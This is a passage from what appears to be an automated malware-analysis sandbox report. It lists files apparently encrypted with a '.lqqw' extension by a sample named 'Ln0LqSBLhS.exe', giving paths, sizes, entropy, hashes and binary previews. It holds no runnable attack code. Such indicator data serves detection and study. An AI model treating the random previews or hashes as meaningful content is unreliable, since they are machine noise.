                                                                                                                                                                                                    Entropy (8bit):7.925975515409831
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:yHT6Ccmzpe52DgWxa1Zq7ygjHG1Wnqu7xC8x8yEwRirY5nVKoB6qD:YJ3zpg2goKZq71HaWqu7xC8B9Qc5kpi
                                                                                                                                                                                                    MD5:03F2B45ECDD80B8FB6B88686CD5C516C
                                                                                                                                                                                                    SHA1:2DB10A92376439A29AB684F0CBBEB0BE51FAC8F5
                                                                                                                                                                                                    SHA-256:C0AD8E7E5C604B6EE3970AB5528D87394435E9117A1EF81DA582E36BD98932D8
                                                                                                                                                                                                    SHA-512:6AF92DECC5CC9AF1E2C085994BCAEE46D0B919534CDE83298C4F65A7D5A138F3DE5075F59683A52E29E59905FE3C9DFF5B3C211330C0A37293B58F2E6EC88F8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Ig.....b..].;.....c.x..:(L.l..o..R.. ..+....;e2.3..%q}.]...1H..LG....7.........,..k..q.B..N.............b.-..(+../.:N|.I..o.."..[.K0...3.S..#V..*.vkQ3.....y..2.n..p.J^.|.#f.\..z..B(.....~.. . "j..^.:....S..[..Q....=..#.6"..k4..E@.$..2.$W.Y.,....b.<..}#.@{r.....s..c0..".Q.4\.........fR..J....W..&v...u.|..mR....G.N.1.._.THy.G5.......I_...D.a..n...H.*.Ue)........XN .;._/TO.@.....1..h~.Jg...].{.\@`T..o.wy...t.FX.lO<.o.^.k.-..So...^.z.@.#y.{.0@h.V....<.....J.h..................|.k.Z...S...~..L....v.....K.j..Q.....;w...>+...5*.....a.......E.....*.>g9I...$....g..:.%..Wn.9...V...5. .}.....}.....g..+....k<f._...F...B...V.....O.W.6...]...;r#.&.....O.1.l......[....../..3.u.H.x.C'...~X..Q...m..^A.N...`.....jX. ..0.r......FF.+,.sz=j..k...8.hg.j.a.@].Ncn.....&.....Yg..jQA.6/d.9...|......m.0....)....0.B.e+..7.r....9N.$...<._.oGP..|*...s....3..b.fD..........- ...(h.x.A.7[.6.Y..U..........J. ..r7..:..x........n.U.C..F.l.<f<.b...>,.Z.r.f...^`...
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2393
                                                                                                                                                                                                    Entropy (8bit):7.925774113920815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:2EBLqwzoeJJd/lYg7YjXHSRl1LZM+64DKOXcB/PbIdC3Ix3OeD:2EBpHdzWiRPr64xW/TEC3IJOm
                                                                                                                                                                                                    MD5:55C62A95B4D7E1EE15F76BEE259FCB8B
                                                                                                                                                                                                    SHA1:77BEF658C77195CD9FF9340113AED7FF6F9C2A14
                                                                                                                                                                                                    SHA-256:18F69DC87DC4C3DDB8115EA97D2C92808D3CB273BA99DFCEDAA6898FAAAB267F
                                                                                                                                                                                                    SHA-512:E2E3A1315E4070FFABEBE8BDC6C0092F990ADE4FD8961D8D256314D5BD08D64B00D436B7FFACFA3A9260F2C9087BDFC039BF0CFC44CC79307A937CBFFE7B470F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f.X.@T........,p.....R..{.+Z.(....M.Z....b....z...$U....k.b...=.;H7x....;.....S..?.u.=&8..n..D..H;..F..w..K.\.;;.fuU..[.z?.{bg.....~../......=.m......0.mJt.s.....0.>^1....*)|.8....}..k..9...mnl..H.X..z..b.o....A...ah....2.('.'....[:j....%.q....*.;s9.#1.@..}.5I}..e.....{D.Z>.=..^#|....p.[.H...jQR.10..a.M?..3Bo.i..2-G`*M.n^#.]..J...k...;=l..@&......P..m$f&....L.H.....-.6.?C.iZ9...*.D.w..W2]..!._>N..*.:..5,.....g.......5...5.;Q.Z7..=.V.j.`..<Z8...c....}r[.....@`.:~..^..;+.P_......ws....w..&(.p.^g.j..J.B../..v.....x.U.Rv.l....f...'...|..G.mzD5H..m.Hx...e}...............#..w..^.c5..!....e9d.<SO-1....9.M....g.+S...@vXn5.F.U_..w.....b..:....N..R..D:.......n.g.....j..`..q......;{."...?.T..3w+UEV.wgR.=....t\.ry.l[..WB..f-...t....6.G0n.qC..P_*.k..g..o"...m>...#."x..../.....=JT.X#D./u....i.........(.Y....s..V....Np..L9f...S.*.....}r.`.g*."..%D!m..'..4}.."t......1.....#.<...&td....Jk...<5R.\........%o..(..f............~b......H.{...x...g.!-.ia....A.=)W.
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2404
                                                                                                                                                                                                    Entropy (8bit):7.911818207408804
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:QhhCiIkx4qJoPYSbXyB1kjlZfuMbqBo0VEVOkPisKoOFD:QhhChkx4qiPYUtlxuMbqDVQOkTY
                                                                                                                                                                                                    MD5:2FED308CD07D4506B2269AE30F5879E1
                                                                                                                                                                                                    SHA1:517244AA3CBF40E97E975A735EDBF301308394F6
                                                                                                                                                                                                    SHA-256:9832E7F9D7606F7808BC2422CD095E1AD42EC3FFD46C411BB5BCA613C21F5B5D
                                                                                                                                                                                                    SHA-512:26470D4068C4F5B04788489DC32C258D05CFB0AF07C9C47A4B003CCC7387AD18F42017E61440294DCC95BF68DD9917CFEC33F68332C8CEA92E5605B80EABB26A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]....'......Q...?...&..5Fy....}..)x..i....}p..<......E.../q.GYr2...p...$..v......xjr....p...#t...T...}..?".^..'..........\.j?)...!&.W....'.G.../...B.B`@9..g=:R.O.+......#....6.f[...>.....e...C.I...#L.J....|..%.v...T....H.L....x.c..D..:4E..e.....)uZ.d.<.....S..p....Q...B...3.....(z.....s...v...............>\o. .1.I...So...sl...5.]^..;d...f.4../."JN.J.o..s.K....F..7...hp.!{h..".s._.O..J...:0..9\$.U.;..[.....J...P...h........WQ............9..F......X...y"......^.0b..... ..(.@.2..y"..O$.}....1...].,......fPv.....=y..J....._:`.V@.^r;.DeI........\...?.d....)...a..'.`1.j.E...g.......m..k).....x'..../.J.%._..K....f..,s...`YQ..X].q...L.m.[WSr.`~..NZ|..O..U.F...1B.........\r_..Ywo..8|.a...mg+1Ivm-.T)....@#..`.#b"..I.wQ..g..._;.>q.|..$......S......D.....;.>.B.u *'..0o/..]1.x.. .+-....c.U...G...n.Ou...`..2}..a...x...P.'dE.......%MP......].....J.L..v....M..M.~3..l........E....@)......a".Nz....8....Eve...{.~.........t.....E..".X..a...AglB4`..I+u.....9..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1865
                                                                                                                                                                                                    Entropy (8bit):7.901307770653989
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Jn+XVZZEWPPtBvyNIK2ErIXBoZeFldewKOe6WBBHcVygHfJaUX3j8/PD:AlTBPlFyIcIkwKVxB84gHhaUX3A/b
                                                                                                                                                                                                    MD5:177C4C8A4AEDBE9975049D53CBDB2C4A
                                                                                                                                                                                                    SHA1:F93D47E455BE38B8315B64C1CBD44AC18A1C9804
                                                                                                                                                                                                    SHA-256:8BAD21E21A72FDAE59C9747154E719FECA444DA1BF41165935C91523083EF171
                                                                                                                                                                                                    SHA-512:9BCCF9FF94764A7544ABEB6E75294AB73E7313F6FF5A638ECE4D30627FED2D0CC58C6936F3769E49A3A6BAFB10DA1060D462BC6A39B5CC19C998F9A1F8F0E1C3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .j.q..c..M&<.8.........g..1.q..i...,.E$.F.O1.....[w.{....`...>@NW[.. ./....~G#JX..p+x.h..X.M.m...t.....c..-...Sm^?C.J...j.....NP.%.qJl....u.........U..)....`.ab|?.....<...6.F.....4S.u..)A..a......M.3Z}z......_4qRI..x..?$"7N..S8.|.2.....>...<G. ..S..q...[> {..k...h...Gm.n.yx.V).g.=9.O......C...w......%0.=..-.._?.....b..@;v...K.ksy..)^. ..v....^.C(...}...t0i...0l...G....0.[......5..[.`.>.._n..Z...~wv.].F..Z.m..t..Rk...H..(I.|V)Cp.h.=......q..,-..p.....P..>......r.].M.&...$_....v,SB.xu..o@...Jt..*.(z%.q/....4AX..w,MV.Ajy.5.o{..R..e.c...m..F..I$k...j.>o...f?)@V..H ..[6$."...U..t..).v....k4[.$!..8.i.2...X#......J{...2.4.K.H....X.B......t}@(.2.........IAP...8Q...*,....t,.|..50......... ........!J..a..9..5.......0.X..oF.?.\....]...._.w...\p....`n.+.l.P.M>.%...{Z.6.I.:D.1Ne.W9.2 S....a..$bN....V. ^..:c;.d[...L\.....?.+ *...Z.B.k...i.I../%a.z.(....Q...mi.'yoI......=..7....1.....^|.S*...S..y1.+...e.....u.......+.gVR..U.,Dn "...\..=.6?.y......T.Na.
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5961
                                                                                                                                                                                                    Entropy (8bit):7.96746245991314
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:duG6hzVvdOMNp3TM6gVluoyUg47eSH0ctQOwWmSkLyKRkxH/HqJZyqk1+dN:wGI0c8nuRUd7MVO+LMtH6gZQ
                                                                                                                                                                                                    MD5:F310098E1B50605A48131864F9DE48BB
                                                                                                                                                                                                    SHA1:7CE38ED97D44748863162FF5F68F985A31EBCDD0
                                                                                                                                                                                                    SHA-256:3974B5DBEB97B7B96A02906C11F2AE5AAE035B9FDDD161F66727C0ADD67CF0C7
                                                                                                                                                                                                    SHA-512:651F88AF7E53BD4D348F4DF4086295D497D6BF733A0D503860351EFF9804CAC12B068625C782010FC73F67C202C593792E04F77C2B004698A95DA3010B281371
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .w.....x...|..y......K.-*.FL........?C.S...#.t...4..l.s.Y..._......)....n.BD~{.s..g0..^#*.,..kg).b......%.S....^&.....N..e.2........J&|..9N.-.k....0..;..s.p[2`....)c...j...\. }.b5=..4.E..c......"0-*...6...~.y.()...E,.X.$Ps.|....."Mk...7...&.Z....T.As%.T.#Z\mV.!8....R....R..].V....Vz"2L].........VE-@}.q.r....iMBy\..h.gt8#/...+.r.H.O.[$.a......}.$WI.5..H......#...z.V../S. 7......8.W.......nU,i.*..N\63.....Qp.9......C.1q...{r*]-...4[..F..St\b.....A...B.$.jc..S...:..Fb.....J.D..@.<SH...rzg.-a.....:.x...:..x.I.}.?..U...B!.z/......R. ...v.3P.9.4B.g.6.'....%9.p....`........~T.+.2..)y^Y.7.J..9.....1.7...........4z:1..2.a....>.%.E.a.,l...5P.N..g...._.H<.Z..%.....Dy..$..e.l...`L.|..Ze.g....#6.a.......u.vA..fM...n...?.H.H..@...+..'..{.p*j..>y..........\.f..c.....Wm...!....=....q...5....B.|..'.X.oH.HY..T"..(.y......./X..:sT2.,].t.z...9E.-*C....T9.i.{..9......K..\...Vb.&.....&.....'.iG .. ..\u....q..m.K!.....OP.F...r..5...LOI.hfq:.....oQ....m....
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):74325
                                                                                                                                                                                                    Entropy (8bit):7.997641382774279
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:gXTxGHQ4WYNMR3qHGGyImgWC2k+hT/tUA6SI+ca8T+rHWuKgox:mEHQHYbmGyIcCp1R/JqHWuKBx
                                                                                                                                                                                                    MD5:840FCDB2C67D41EE7A30EF6CB04E7E5E
                                                                                                                                                                                                    SHA1:C187F0C14CB7A395A26DEEF2FEA95531287AE867
                                                                                                                                                                                                    SHA-256:F349C86FCD728007D9ABA71901B72FEDE67275B93F5D63224AFD1850170A070C
                                                                                                                                                                                                    SHA-512:637037F1B01840CF272FBCC1F9A01DDDF1A6533474C00D0867C1E8D4795DCD927A28F71024D2F38DA1EB18DC2B970D7B26DEC0E923302DC66B92A07AE298F17A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..p....(.T......7...j.D..+B.G.Pt.X.Gn2T..^.E../x..nR..._E.`..'w~.Q...........Z..y..w.....O...z....5..Cj..-_K..............^l. ..7...<...p...Rx$@]OGD.t..{ ....i&;dkMC.{j.....X.W....Yi.[._..ji..\..G...91.4....Sj...%....+........!5..K(.\\.KX%..w........)F..q..K..6Q.u.2....*...?.....>a.m.mQ|.......JK..._i.e..V...77.~.d......E....2.xj....)G.ZP...}-...........z5..C..Y..*=%..p.rJtgTvN...T.7....^CT.^..bv..f.bG5K..HN......U..Q.......I..{..,.....p..V.-^?...'#y"U.....X.OF.9..x....l(2....=...B3..4k....}X....p[*.J.nRC.yN......&.4p....4....U....vj...]...-:..,...MtD.....wty...w.(m..._..U.AB..z|..%KA...{h..l..#...N..>.vu.&.<....E[...6......A...*....N-...n0.0>fE..E....X.g..G.._E..)"`.}&...[.K...X........;LX.').{L...r3t..9yG...zU............2..t.j-}....e ...`].].....77..u.V...F.9]...>.\.... .......Z.5..:.~......J.........g.....4...96&.+X$Q....C...Q.......Zr.$&.Fo..qV..[e2...s+.'..x.\,..x..e.}..$.........}.s..O.i...A.a._(...._.......B.....W.....z...h.
                                                                                                                                                                                                    C:\Users\user\Cookies\deprecated.cookie.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                    Entropy (8bit):7.358484542177652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:RvvDzH9NBM7Sh6uHGZBk7qOTnz5wQt3tgeyT061j41O2iFl75dExcii96Z:prb9N4CmZWPN3tgeyTFj41Pikcii9a
                                                                                                                                                                                                    MD5:E408DEEE3E9838BD343A586636E1F8E4
                                                                                                                                                                                                    SHA1:4B12DF78289C708D326B4B4E08E5F1BC8C273753
                                                                                                                                                                                                    SHA-256:4EC1A561E5A4787A3CF37E347E702D45B5A5423BEEC74165D5A5FC6840181CF8
                                                                                                                                                                                                    SHA-512:6EA60D30C49EEE5A0D5EFB3C50887DF617B08BFC79FC415E189EA4004690368F61DD1E2E478DE60E176BDDB5C9F1ACE914B362A55CACB475F8CAA2C787F332AC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........9..f..l..~.7g.G.Pw4-.Mfz..._....b.-.\..|k.6R.".B_...n.........._..R{v.......b....WY{.#.@1..4....mH...^i.....@.0..OE..[...UB._.....?e.<..V.{i&.f.._-..L..0...............AR...)b...l..9.......u..7....B......]..Cj^Jb....b..}.4...h..-.P\.BP.X..v.q0.[D..k.\m~^...H$..q....r$..z1|..Ub...e..m.E..z.Zs..d^.G.@n.X[fSZ...bt5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.85425414623726
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:HwKNWtjxesNcq/+9NtBZSbEGlqMDJW9VpfQC4zTmilznzwCVmjYdv3Snb6Di9xB2:dHvNNS6863YzD83Ydve6CwD
                                                                                                                                                                                                    MD5:CBA7BF6F40E2EC15A737E930816CEC0A
                                                                                                                                                                                                    SHA1:692A18E7C1C4EBA27A8D0D353443648B3E325FE8
                                                                                                                                                                                                    SHA-256:C48109DAB298A844ABBDB7E8E569C7CB0C43CEB090E027ECA6A5D2AEF70DD6F5
                                                                                                                                                                                                    SHA-512:2945B7748B08FEFC1E38439B57DB81F9334B300524FBD9758B4B3CD2982F1F78AD75D30B54F554288C2376EF158FD281CC111E976870736D488DA7550AD10841
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...1...w....Q.l0.d...p}E;!u...~.......}z.Y=.4.W...U..hV..|v.Y...I.).aG...5.3.kow.DZ.9:..9EE..^.9.R.C................Sl..}..R...$.}cO]7T%fBN_\..=x.0..+..`..%.z..F.....db..g6W......(z....^....-s..0..U.%_. "...W..H1.$.)...5..h.Yx!+0i.@..A0..l...D...&ooD.4N...s......>.n...h.N..&.../..6/.z....%.DG..V..f.+w.3..\8...8t#.~.&e...h..c.Y._....e.7j.K:Es\.[&......8...k2y...4..Y..w...')>........+.....s!..A.....cn...c%.....Q....s..'...2...>..U....a.eZ'". fU.O7R..0|..p.n.....d..../..+Bg...:4........8......g...../.L.f.. .7l.8.BsfH..m........../.#-.9&.G=........o@J.../...d...jj.....6...">bd.<........s.j.k...W....5`..:.r..;.....`....y....m...mh..u...m....92..^....BT...g..".]...e.....s4.C.|n.x....7...<Y...J..b:.......p.PFN$........F.s.. ....o.W.d-.....]K....s..9x.!.O;......M...y...U.!.#o[<.T<X..e]...B..*%.udV...?[..a....DV.....i<.^..~.5..."..yuE....%T.t..:8i..)S....b..@...ac...'V.b...,g.Y..!Y..JD.F:N.,D.."M.......09.o.;....1.."Zf"...7..Wt....Z&...&.uZ....
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.85425414623726
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:HwKNWtjxesNcq/+9NtBZSbEGlqMDJW9VpfQC4zTmilznzwCVmjYdv3Snb6Di9xB2:dHvNNS6863YzD83Ydve6CwD
                                                                                                                                                                                                    MD5:CBA7BF6F40E2EC15A737E930816CEC0A
                                                                                                                                                                                                    SHA1:692A18E7C1C4EBA27A8D0D353443648B3E325FE8
                                                                                                                                                                                                    SHA-256:C48109DAB298A844ABBDB7E8E569C7CB0C43CEB090E027ECA6A5D2AEF70DD6F5
                                                                                                                                                                                                    SHA-512:2945B7748B08FEFC1E38439B57DB81F9334B300524FBD9758B4B3CD2982F1F78AD75D30B54F554288C2376EF158FD281CC111E976870736D488DA7550AD10841
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...1...w....Q.l0.d...p}E;!u...~.......}z.Y=.4.W...U..hV..|v.Y...I.).aG...5.3.kow.DZ.9:..9EE..^.9.R.C................Sl..}..R...$.}cO]7T%fBN_\..=x.0..+..`..%.z..F.....db..g6W......(z....^....-s..0..U.%_. "...W..H1.$.)...5..h.Yx!+0i.@..A0..l...D...&ooD.4N...s......>.n...h.N..&.../..6/.z....%.DG..V..f.+w.3..\8...8t#.~.&e...h..c.Y._....e.7j.K:Es\.[&......8...k2y...4..Y..w...')>........+.....s!..A.....cn...c%.....Q....s..'...2...>..U....a.eZ'". fU.O7R..0|..p.n.....d..../..+Bg...:4........8......g...../.L.f.. .7l.8.BsfH..m........../.#-.9&.G=........o@J.../...d...jj.....6...">bd.<........s.j.k...W....5`..:.r..;.....`....y....m...mh..u...m....92..^....BT...g..".]...e.....s4.C.|n.x....7...<Y...J..b:.......p.PFN$........F.s.. ....o.W.d-.....]K....s..9x.!.O;......M...y...U.!.#o[<.T<X..e]...B..*%.udV...?[..a....DV.....i<.^..~.5..."..yuE....%T.t..:8i..)S....b..@...ac...'V.b...,g.Y..!Y..JD.F:N.,D.."M.......09.o.;....1.."Zf"...7..Wt....Z&...&.uZ....
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847107169192292
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:+772Za1X7AXH6RrAZxBY/kqpdvgkpDLQ8jX/EGMV25nmf0XDjsWbD:+77MiLAX6r4B2kqzIaPEN85ljsED
                                                                                                                                                                                                    MD5:29E8D316221F1F12592E9A60B46C294D
                                                                                                                                                                                                    SHA1:27F576C95C815CC0AA760B36AB919AA25A6DF0A7
                                                                                                                                                                                                    SHA-256:1B00614AC8B3FA95BCCB7B20447E8D622F8A2226EFDBFF94B936352EF8CACAD1
                                                                                                                                                                                                    SHA-512:A96B8BC3D6062E1944761CE54D8233520455F4AB02BFF76000E5A5BC044C46DAA44E50C717E290600DA10D2A91EF14F505265C82FFF38BDA77C99125E69A5041
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..t.y...G.@0Dl..D...mm.0}.WY.U.m.9;.0.... .BP=6.....7.....].!(...!....k.}.m.g.6.At.....V..-..&..;T.`R.E*.ZnI..M.v......h..,F"-.Njp..M.=m.t.,...,.ML.Pe..Y.U..a .......AM....4.o.#....lD.i....x....y.l..H.2N..}$...vlA.+...Iu......g.&.v.B.B.Nt@[)!.]w..g>||.#cBjR./......._7..w.[.G....."...3$..qy...Mm....C....._..=b..V\:[(..h.u....+.,P...#..j....@.%..&R.....9y..#....xBkzu...ts<.ct...(.=....T[.g..$.!...Xvg........Y...;...O>.?...y.X2.e.K...L.o6.(^:.-iZa..,......<......Sa..U.<....vQ......]-.|.......F....a.'...B]....J.xE..h&.[Q.+....MeH<....h..^.3..i..;..>Y."....*..c..B._.....QIi..XA..;c...T. ~.r.........V.J..=..M2.....L.V..H.....3.....Y.=I1FG.).~.J.<.c.1.t....X#{.2..2t>...:....I.q^...2i.l+.Q..y....T9./..H.......la.NA:.S...t........f..:...;|...z8...|...%aN.i....v..........r......F....#E...d~.)....S........V.WWCy.9dn....@...9.....'....}.4d.....??x...@.j..*.m....q......d....A...V.zW.=..0.kZQ..n.~+j..o.?\.e.mH.....9p,..S.....Oj(D!.gN.5.....%ES....V..
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847107169192292
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:+772Za1X7AXH6RrAZxBY/kqpdvgkpDLQ8jX/EGMV25nmf0XDjsWbD:+77MiLAX6r4B2kqzIaPEN85ljsED
                                                                                                                                                                                                    MD5:29E8D316221F1F12592E9A60B46C294D
                                                                                                                                                                                                    SHA1:27F576C95C815CC0AA760B36AB919AA25A6DF0A7
                                                                                                                                                                                                    SHA-256:1B00614AC8B3FA95BCCB7B20447E8D622F8A2226EFDBFF94B936352EF8CACAD1
                                                                                                                                                                                                    SHA-512:A96B8BC3D6062E1944761CE54D8233520455F4AB02BFF76000E5A5BC044C46DAA44E50C717E290600DA10D2A91EF14F505265C82FFF38BDA77C99125E69A5041
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..t.y...G.@0Dl..D...mm.0}.WY.U.m.9;.0.... .BP=6.....7.....].!(...!....k.}.m.g.6.At.....V..-..&..;T.`R.E*.ZnI..M.v......h..,F"-.Njp..M.=m.t.,...,.ML.Pe..Y.U..a .......AM....4.o.#....lD.i....x....y.l..H.2N..}$...vlA.+...Iu......g.&.v.B.B.Nt@[)!.]w..g>||.#cBjR./......._7..w.[.G....."...3$..qy...Mm....C....._..=b..V\:[(..h.u....+.,P...#..j....@.%..&R.....9y..#....xBkzu...ts<.ct...(.=....T[.g..$.!...Xvg........Y...;...O>.?...y.X2.e.K...L.o6.(^:.-iZa..,......<......Sa..U.<....vQ......]-.|.......F....a.'...B]....J.xE..h&.[Q.+....MeH<....h..^.3..i..;..>Y."....*..c..B._.....QIi..XA..;c...T. ~.r.........V.J..=..M2.....L.V..H.....3.....Y.=I1FG.).~.J.<.c.1.t....X#{.2..2t>...:....I.q^...2i.l+.Q..y....T9./..H.......la.NA:.S...t........f..:...;|...z8...|...%aN.i....v..........r......F....#E...d~.)....S........V.WWCy.9dn....@...9.....'....}.4d.....??x...@.j..*.m....q......d....A...V.zW.=..0.kZQ..n.~+j..o.?\.e.mH.....9p,..S.....Oj(D!.gN.5.....%ES....V..
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\DUUDTUBZFW.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847190826361309
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:xq/By8yMyIannYfn/z77t+PRqmhAx0JPsJG0JkGXGpMT67eASNEEYbD:oBy8yyfL9SRESJPqDCG4MweASNwD
                                                                                                                                                                                                    MD5:7E7A92A7C78F39997FF782119F651A97
                                                                                                                                                                                                    SHA1:E50C0100C28BC6E6F242A392F08774445255F033
                                                                                                                                                                                                    SHA-256:8B5DC1FB36F17D0EC2E745977288E827853A47AD96214C6954BAA046B4B7FF8C
                                                                                                                                                                                                    SHA-512:D71E448230D97C21888C5D03388AB04ADC8D31F0D224A022C3F178B3B9B867A3F7B5F477A69998DABF290B04A89028C57ECD950D2CA5644873DE7900AF288DDB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....N..b..5.\L.2.n....:.Hrm..f.t<F.... ..C..\..L.....*...J...w?..n#...J0........]..)p5F..e.z.j...0.....|...L....+R...mA.+...A..r.....e.&C.\.8.0....3..M..Fq.\Zo,..........Y:.K.\.Y.)2..|...X./.<..y.Y..yi7..kC......b............(.g...A.....0X,."+l...5W.&...."W&...g%.....u.R..ox............p..K..z..b.....<../"k.:wS..Z.}l...........~p........E...Et.o.FY.=F...e....x.R.I!T."=.G;a..9.r..b.lT...}#.......1 q..2.{........!d?..D.k...V.1...b.]R.*G#.3..Z.Uo.G.._.<.7..iD.-.....o.t\.]?..l.>.c..>.eT.2.....1.Zt.E.p$.=g.F.=.0v.7...fn.p[.<...]p]TN..0..4L.=w..?_j..x.!Be...=..*......j.),%R.je.p.....e..)UY.N.P...W.?.;.6.....N.a[b....0....q..........1.D...Sar8C.@.on.;l..t..t>.C$..#.U.q^.B?...v..{2.|...Z...a...5^.&.VX..n$........{..=....=....m.......<..s.....r.'.|0ctEq.p......p...i,..i.w. .2C.......YU.rx..V`...[w.Ckz..@i..g.i....2...;.$.8\.<a.d.x_~......[......q..N..2....R.mR.cO....U_.v?L~QYO..s....r.>=.c(r.[B.NGF..E.@)N.......^.....,~?y.>.~Ij.*.u...zt..
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\DUUDTUBZFW.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847190826361309
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:xq/By8yMyIannYfn/z77t+PRqmhAx0JPsJG0JkGXGpMT67eASNEEYbD:oBy8yyfL9SRESJPqDCG4MweASNwD
                                                                                                                                                                                                    MD5:7E7A92A7C78F39997FF782119F651A97
                                                                                                                                                                                                    SHA1:E50C0100C28BC6E6F242A392F08774445255F033
